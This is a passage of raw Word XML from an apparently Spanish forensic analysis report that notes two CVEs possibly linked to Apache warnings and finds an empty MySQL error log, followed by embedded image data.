        </w:rPr>
        <w:t xml:space="preserve"> no están provocando error alguno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09F2F3" w14:textId="720EB258" w:rsidR="00371A7E" w:rsidRDefault="00371A7E" w:rsidP="00371A7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por otro lado, </w:t>
      </w:r>
      <w:r w:rsidR="009E264A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>estas advertencias pudieran</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser plausible un posible ataque haciendo uso de las vulnerabilidades CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CVE (Common Vulnerabilities and Exposures): Lista de registros de información pública sobre vulnerabilidades de seguridad.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-2018-20149 y CVE-2018-20152</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BF8BF" w14:textId="7D7ABCE8" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00062086" w:rsidP="00062086">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:t xml:space="preserve">Archivos de log de </w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274D9679" w14:textId="008F1F83" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Otro de los servicios, pero de los que no tenemos un acceso confirmado, distinto de apache </w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sí</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que estaba confirmado, es el servicio de MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. para ello procederemos a analizar la carpeta </w:t>
      </w:r>
      <w:r w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/mysql/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. En ella solo encontramos el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>error.log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, el cual, está vacío.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21598C15" w14:textId="00EE5E05" w:rsidR="00346B3E" w:rsidRDefault="009A067C" w:rsidP="00346B3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251833344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76FE4C26" wp14:editId="7FE75CCD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4386</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>377707</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5201920" cy="2400935"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="314759974" name="Grupo 41"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5201920" cy="2400935"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5201920" cy="2400935"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1869821232" name="Grupo 10"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5201920" cy="2400935"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5201920" cy="2400935"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="939462535" name="Imagen 88" descr="Interfaz de usuario gráfica, Aplicación, Tabla&#10;&#10;Descripción generada automáticamente"/>
                            <pic:cNvPicPr>
                              <a:picLocks noChangeAspect="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315210" cy="2400935"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1786703370" name="Imagen 90"/>
                            <pic:cNvPicPr>
                              <a:picLocks noChangeAspect="1"/>
                            </pic:cNvPicPr>
                          </pic:nvPicPr>
                          <pic:blipFill>
                            <a:blip r:embed="rId225">
                              <a:extLst>
                                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                                </a:ext>
                              </a:extLst>
                            </a:blip>
                            <a:srcRect/>
                            <a:stretch>
                              <a:fillRect/>
                            </a:stretch>
                          </pic:blipFill>
                          <pic:spPr bwMode="auto">
                            <a:xfrm>
                              <a:off x="2413000" y="6350"/>
                              <a:ext cx="2788920" cy="1979295"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1871841824" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2541181" y="2020186"/>
                            <a:ext cx="2444750" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7AAEF5A5" w14:textId="58989417" w:rsidR="001C78D9" w:rsidRPr="00214F91" w:rsidRDefault="001C78D9" w:rsidP="001C78D9">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>53</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="134" w:name="_Toc155782620"/>
                              <w:r w:rsidRPr="005B6284">
                                <w:t>Análisis de MySQL.</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FE4C26" id="Grupo 41" o:spid="_x0000_s1200" style="position:absolute;left:0;text-align:left;margin-left:.35pt;margin-top:29.75pt;width:409.6pt;height:189.05pt;z-index:251833344" coordsize="52019,24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